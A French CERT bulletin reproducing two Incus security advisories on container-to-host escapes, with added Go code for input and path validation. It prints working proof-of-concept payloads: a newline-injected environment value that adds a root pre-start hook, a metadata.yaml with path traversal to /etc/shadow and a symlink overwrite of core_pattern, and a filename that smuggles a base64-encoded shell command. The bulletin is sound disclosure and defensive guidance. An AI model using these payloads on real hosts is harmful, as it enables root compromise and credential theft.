
=====================================================================

                            CERT-Renater

                Note d'Information No. 2026/VULN065
_____________________________________________________________________

DATE                : 23/01/2026

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running incusd (Go) versions prior to
                     6.21.0, 6.0.6.

=====================================================================
https://github.com/lxc/incus/security/advisories/GHSA-x6jc-phwx-hp32
https://github.com/lxc/incus/security/advisories/GHSA-7f67-crqm-jgh7
_____________________________________________________________________

Container environment configuration newline injection
High
stgraber published GHSA-x6jc-phwx-hp32 Jan 22, 2026

Package
github.com/lxc/incus/v6/cmd/incusd (Go)

Affected versions
< v6.21.0

Patched versions
v6.21.0, v6.0.6


Description

Summary

A user with the ability to launch a container with a custom YAML
configuration (e.g. a member of the 'incus' group) can set an
environment variable whose value contains newlines. Because the value
is written verbatim into the container's lxc.conf, the extra lines
become additional configuration items (newline injection). This allows
adding arbitrary lifecycle hooks, ultimately resulting in arbitrary
command execution on the host.


Details

When environment variables are passed in the config block of a new
container, their values are not checked for the presence of newlines
[1]. A multi-line value is therefore written as several lines of the
generated container lxc.conf, which lets the user set arbitrary
additional configuration items, such as lxc.hook.pre-start. A user with
the ability to launch a container with an arbitrary config can thereby
achieve arbitrary command execution as root on the host.

Exploiting this issue on IncusOS requires a slight modification of the
payload to change to a different writable directory for the validation
step (e.g. /tmp). This can be confirmed with a second container with
/tmp mounted from the host (a privileged action, for validation only).

[1] https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L1081
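The following Go program is an added illustration of the defect class
described above and of the fix a maintainer would want; it is not code
from Incus, from the advisory or from the attached patch. It assumes
that environment.* entries are rendered as lxc.environment = NAME=VALUE
lines (the exact rendering inside incusd is not shown on this page), and
all function names are this example's own. It shows how an unchecked
renderer turns a single multi-line value into two configuration keys,
how a small parser makes the injected key visible, and how a validating
renderer refuses the entry instead.

```go
package main

import (
	"errors"
	"fmt"
	"sort"
	"strings"
)

// ErrUnsafeEnvEntry is returned for an environment.* entry that cannot be
// emitted as a single lxc.conf line.
var ErrUnsafeEnvEntry = errors.New("environment entry would span multiple lxc.conf lines")

// envLine formats one entry in the shape of LXC's lxc.environment key; the
// exact rendering is an assumption of this example, not Incus's own code.
func envLine(name, value string) string {
	return fmt.Sprintf("lxc.environment = %s=%s", name, value)
}

// sortedEnvKeys returns the environment.* keys of an instance config in a
// stable order so the rendered output is deterministic.
func sortedEnvKeys(config map[string]string) []string {
	var keys []string
	for k := range config {
		if strings.HasPrefix(k, "environment.") {
			keys = append(keys, k)
		}
	}
	sort.Strings(keys)
	return keys
}

// renderEnvUnchecked reproduces the defect class: values are copied verbatim,
// so a value containing "\n" turns into additional configuration lines.
func renderEnvUnchecked(config map[string]string) string {
	var b strings.Builder
	for _, k := range sortedEnvKeys(config) {
		b.WriteString(envLine(strings.TrimPrefix(k, "environment."), config[k]) + "\n")
	}
	return b.String()
}

// validateEnvEntry rejects names and values containing line terminators; the
// name must also not contain '=' so it cannot masquerade as another key.
func validateEnvEntry(name, value string) error {
	if name == "" || strings.ContainsAny(name, "\r\n=") || strings.ContainsAny(value, "\r\n") {
		return fmt.Errorf("%w: %q", ErrUnsafeEnvEntry, name)
	}
	return nil
}

// renderEnv is the hardened renderer: it refuses the whole config when any
// entry fails validation instead of silently truncating or escaping it.
func renderEnv(config map[string]string) (string, error) {
	var b strings.Builder
	for _, k := range sortedEnvKeys(config) {
		name := strings.TrimPrefix(k, "environment.")
		if err := validateEnvEntry(name, config[k]); err != nil {
			return "", err
		}
		b.WriteString(envLine(name, config[k]) + "\n")
	}
	return b.String(), nil
}

// parseLXCConfKeys counts each "key = value" line of an lxc.conf fragment;
// an injected hook shows up as a key the operator never configured.
func parseLXCConfKeys(conf string) map[string]int {
	counts := map[string]int{}
	for _, line := range strings.Split(conf, "\n") {
		line = strings.TrimSpace(line)
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		if key, _, ok := strings.Cut(line, "="); ok {
			counts[strings.TrimSpace(key)]++
		}
	}
	return counts
}

func main() {
	// Constructed sample in the advisory's shape, using a harmless command.
	injected := map[string]string{"environment.FOO": "abc\nlxc.hook.pre-start = /bin/true"}
	fmt.Println("unchecked rendering yields keys:", parseLXCConfKeys(renderEnvUnchecked(injected)))
	if _, err := renderEnv(injected); err != nil {
		fmt.Println("hardened renderer:", err)
	}
	if out, err := renderEnv(map[string]string{"environment.FOO": "abc"}); err == nil {
		fmt.Print("benign config renders as:\n", out)
	}
}
```

The same validateEnvEntry check is also useful on the defensive side
before upgrading: run it over the environment.* keys of each existing
instance (as printed by incus config show) to find values that already
contain line breaks, since a patched incusd rejecting such entries on
restart is easier to deal with when the offending instances are known.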

PoC

The attached proof-of-concept script, environment_newline_injection.sh,
demonstrates arbitrary command execution by writing a file to the root
filesystem (/newline_injection_command_exec_poc).

Manual Reproduction steps:

    1. Launch a new container with a configuration file containing a
       multiline YAML string as an environment variable value, such as
       in the listing below.
    2. Observe that the lxc.conf (/run/incus/user-1000_poc/lxc.conf in
       my case) contains an additional lxc.hook.pre-start item.
    3. Observe the creation of the file in the host root directory,
       with contents proving command execution as root.

incus launch images:alpine/edge --ephemeral poc << EOF
config:
  environment.FOO: |-
    abc
    lxc.hook.pre-start = /bin/sh -c "id > /newline_injection_command_exec_poc"
EOF

Impact

A user with the ability to launch a container with a custom YAML
configuration (e.g. a member of the 'incus' group) can achieve
arbitrary command execution on the host.

Attachments

environment_newline_injection.sh
environment_newline_injection.patch


Severity
High
8.7 / 10

CVSS v3 base metrics
Attack vector
Adjacent
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
None
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

CVE ID
CVE-2026-23953

Weaknesses
Weakness CWE-93

Credits

    @rmcnamara-snyk (Reporter)

_____________________________________________________________________


Container image templating arbitrary host file read and write
High
stgraber published GHSA-7f67-crqm-jgh7 Jan 22, 2026

Package
github.com/lxc/incus/v6/cmd/incusd (Go)

Affected versions
< v6.21.0

Patched versions
v6.21, v6.0.6


Description

Summary

A user with the ability to launch a container with a custom image (e.g.
a member of the 'incus' group) can use directory traversal or symbolic
links in the templating functionality to read and write arbitrary files
on the host, ultimately resulting in arbitrary command execution on the
host. This can also be exploited on IncusOS.


Details

When an image's metadata.yaml contains templates, neither the source
path nor the target path is checked for symbolic links or directory
traversal [1] [2]. For example, the following metadata.yaml snippet
reads an arbitrary file from the host root filesystem as root and
places it inside the container:

templates:
  /shadow:
    when:
      - start
    template: ../../../../../../../../etc/shadow

Additionally, the template's target path is neither validated nor
opened in a symlink-safe way, so it can pass through symbolic links
pointing outside the container root filesystem. For example:

templates:
  /realroot/proc/sys/kernel/core_pattern:
    when:
      - start
    template: core_pattern.tpl

Here the container root filesystem contains a symbolic link named
/realroot pointing to /. As a result, the contents of the template
(taken from the normal "templates" directory in this case) are written
to the host root filesystem as root.

This can be exploited to achieve arbitrary command execution on the 
host by overwriting key files. In the provided proof of concept, I am 
overwriting /proc/sys/kernel/core_pattern, followed by causing a crash 
inside the container once launched to execute arbitrary commands on 
the host. Many other methods are possible depending on the host 
operating system and configuration.

This vulnerability can be exploited by any user who can launch a new 
container with a custom image.

Exploiting this vulnerability on IncusOS requires a slight modification
of stage2 to change to a different writable directory for the
validation step (e.g. /tmp). This can be confirmed with a second
container with /tmp mounted from the host (a privileged action, for
validation only).

[1] https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7215
[2] https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7294
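As an added example of the check the two findings above call for (this
is not Incus code and not the attached patch; the helper names
resolveUnderRoot and templatePaths are this example's own), the Go
program below resolves both sides of a template entry under their
respective roots. The template name must stay inside the image's
templates directory, the target must stay inside the container rootfs
after following any symlinks that already exist on the way, and a
dangling symlink in the path is refused because a later create-on-write
would follow it. The sample rootfs with a realroot -> / link is
constructed in a temporary directory, mirroring the image layout from
the advisory.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

var (
	// ErrEscapesRoot: the path, after symlink resolution, lies outside the root.
	ErrEscapesRoot = errors.New("path resolves outside the permitted root")
	// ErrDanglingSymlink: a component is a symlink to a missing target, so a
	// later create-on-write would follow it to wherever it points.
	ErrDanglingSymlink = errors.New("path crosses a dangling symbolic link")
)

// resolveUnderRoot resolves rel against root, following symlinks that already
// exist on the way, and returns the real host path only if it stays inside
// root. Missing trailing components are allowed so a target can be created.
func resolveUnderRoot(root, rel string) (string, error) {
	sep := string(filepath.Separator)
	rel = filepath.Clean(rel)
	if filepath.IsAbs(rel) || rel == ".." || strings.HasPrefix(rel, ".."+sep) {
		return "", fmt.Errorf("%w: %q", ErrEscapesRoot, rel)
	}
	rootReal, err := filepath.EvalSymlinks(root)
	if err != nil {
		return "", err
	}
	if rootReal, err = filepath.Abs(rootReal); err != nil {
		return "", err
	}
	// Walk upward from the full candidate path to the longest prefix that
	// exists; EvalSymlinks canonicalises that prefix through any symlinks.
	p, rest, resolved := filepath.Join(rootReal, rel), "", ""
	for {
		r, evalErr := filepath.EvalSymlinks(p)
		if evalErr == nil {
			resolved = r
			break
		}
		if fi, lerr := os.Lstat(p); lerr == nil && fi.Mode()&os.ModeSymlink != 0 {
			return "", fmt.Errorf("%w: %s", ErrDanglingSymlink, p)
		}
		if p == rootReal {
			return "", evalErr
		}
		rest = filepath.Join(filepath.Base(p), rest)
		p = filepath.Dir(p)
	}
	final := filepath.Join(resolved, rest)
	if final != rootReal && !strings.HasPrefix(final, rootReal+sep) {
		return "", fmt.Errorf("%w: %q -> %s", ErrEscapesRoot, rel, final)
	}
	return final, nil
}

// templatePaths checks both sides of a metadata.yaml template entry: the
// template file must stay inside templatesDir and the target inside rootfs.
func templatePaths(rootfs, templatesDir, target, tplName string) (src, dst string, err error) {
	if src, err = resolveUnderRoot(templatesDir, tplName); err != nil {
		return "", "", fmt.Errorf("template source: %w", err)
	}
	if dst, err = resolveUnderRoot(rootfs, strings.TrimLeft(target, "/")); err != nil {
		return "", "", fmt.Errorf("template target: %w", err)
	}
	return src, dst, nil
}

func main() {
	// Constructed sandbox: a temporary rootfs containing a symlink
	// "realroot" -> /, mirroring the image layout from the advisory.
	dir, err := os.MkdirTemp("", "incus-tpl-")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	rootfs, tplDir := filepath.Join(dir, "rootfs"), filepath.Join(dir, "templates")
	for _, d := range []string{rootfs, tplDir} {
		if err := os.MkdirAll(d, 0o755); err != nil {
			panic(err)
		}
	}
	if err := os.Symlink("/", filepath.Join(rootfs, "realroot")); err != nil {
		panic(err)
	}
	for _, e := range [][2]string{
		{"/etc/hostname", "hostname.tpl"},
		{"/shadow", "../../../../../../../../etc/shadow"},
		{"/realroot/proc/sys/kernel/core_pattern", "hostname.tpl"},
	} {
		src, dst, err := templatePaths(rootfs, tplDir, e[0], e[1])
		fmt.Printf("target=%s template=%s\n  src=%s dst=%s err=%v\n", e[0], e[1], src, dst, err)
	}
}
```

A path-string check like this still leaves a window between resolution
and the actual write in which a symlink could be swapped in, so a
production fix should additionally open the final component with
O_NOFOLLOW, or on Linux 5.6+ use openat2 with RESOLVE_BENEATH or
RESOLVE_IN_ROOT, which makes the kernel enforce the containment at open
time.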


PoC

The attached proof-of-concept script, template_arbitrary_write.sh,
demonstrates reading a file from the host filesystem (/etc/shadow) as
well as a method for escaping the container to achieve arbitrary
command execution, which writes a file to the root filesystem
(/template_arbitrary_write_cmd_exec_poc).

Manual Reproduction steps:

    1. Obtain and unpack a legitimate root filesystem (e.g. alpine/edge)
       into a directory named rootfs.
    2. Inside the unpacked root filesystem, create a symbolic link named
       'realroot' (i.e. ln -s / rootfs/realroot).
    3. Create a directory named "templates" alongside the rootfs
       directory. Include a file core_pattern.tpl containing
       |/bin/sh -c "%E"
    4. Additionally, add files segfault.c and stage2 to the root
       filesystem (listed below), setting stage2 executable
       (chmod +x rootfs/stage2).
    5. Create a metadata.yaml for this image. A sample is listed below.
    6. Create the image archive (tar cf poc.tar *) and import it into
       incus (incus image import poc.tar --alias poc).
    7. Launch the newly imported image and obtain a shell
       (incus launch poc poc --ephemeral; incus shell poc).
    8. Observe that the file /shadow inside the container contains the
       contents of the /etc/shadow file from the host (host file read
       vulnerability).
    9. Compile segfault.c into a file named
       x$(echo L3Zhci9saWIvaW5jdXMvY29udGFpbmVycy8qL3Jvb3Rmcy9zdGFnZTIK|base64 -d|sh).
       This filename will be interpolated into the %E value set in the
       core_pattern by the host file write vulnerability, and will find
       and execute the stage2 binary inside the container rootfs.
    10. Execute the compiled binary (e.g. /x*). Observe the creation of
        the file /template_arbitrary_write_cmd_exec_poc on the host,
        containing the output of 'id' showing command execution by the
        host root user.

segfault.c:

int main() {
    int *p = 0;
    *p = 42;
    return 0;
}

stage2:

#!/bin/sh
id > /template_arbitrary_write_cmd_exec_poc

metadata.yaml:

architecture: x86_64
creation_date: 1
properties:
  architecture: amd64
  description: Exploit
  os: Exploit
  release: Exploit 1.0
templates:
  /shadow:
    when:
      - start
    template: ../../../../../../../../etc/shadow

  /realroot/proc/sys/kernel/core_pattern:
    when:
      - start
    template: core_pattern.tpl


Impact

A user with the ability to launch a container with a custom image can
achieve arbitrary command execution on the host.

Attachments

template_arbitrary_write.sh
templates_arbitrary_write.patch


Severity
High
8.7 / 10

CVSS v3 base metrics
Attack vector
Adjacent
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
None
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

CVE ID
CVE-2026-23954

Weaknesses
Weakness CWE-22

Credits

    @rmcnamara-snyk (Reporter)



=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================